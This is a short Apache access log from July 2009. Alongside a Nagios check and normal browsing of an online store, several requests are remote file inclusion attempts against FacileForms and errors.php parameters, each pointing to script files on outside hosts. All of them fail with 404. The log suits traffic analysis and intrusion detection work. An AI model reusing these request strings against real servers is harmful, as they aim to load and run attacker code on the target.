114.200.199.144 - - [01/Jul/2009:05:57:11 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.11.230.36 - - [01/Jul/2009:05:57:17 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [01/Jul/2009:05:57:17 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:05:57:23 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:05:57:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.8.115.172 - - [01/Jul/2009:05:57:54 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS%20(S0040):0 HTTP/1.1" 200 63436 "http://www.acesurgical.com/osteocel.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
213.8.115.172 - - [01/Jul/2009:05:57:56 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
213.8.115.172 - - [01/Jul/2009:05:57:56 -0400] "GET /images/items/0034215_THUMB.JPG HTTP/1.1" 200 1734 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
213.8.115.172 - - [01/Jul/2009:05:57:57 -0400] "GET /images/items/0034211_THUMB.JPG HTTP/1.1" 200 13601 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
213.8.115.172 - - [01/Jul/2009:05:57:57 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
213.8.115.172 - - [01/Jul/2009:05:57:57 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
124.0.145.1 - - [01/Jul/2009:05:58:38 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:05:58:38 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.145.1 - - [01/Jul/2009:05:58:38 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
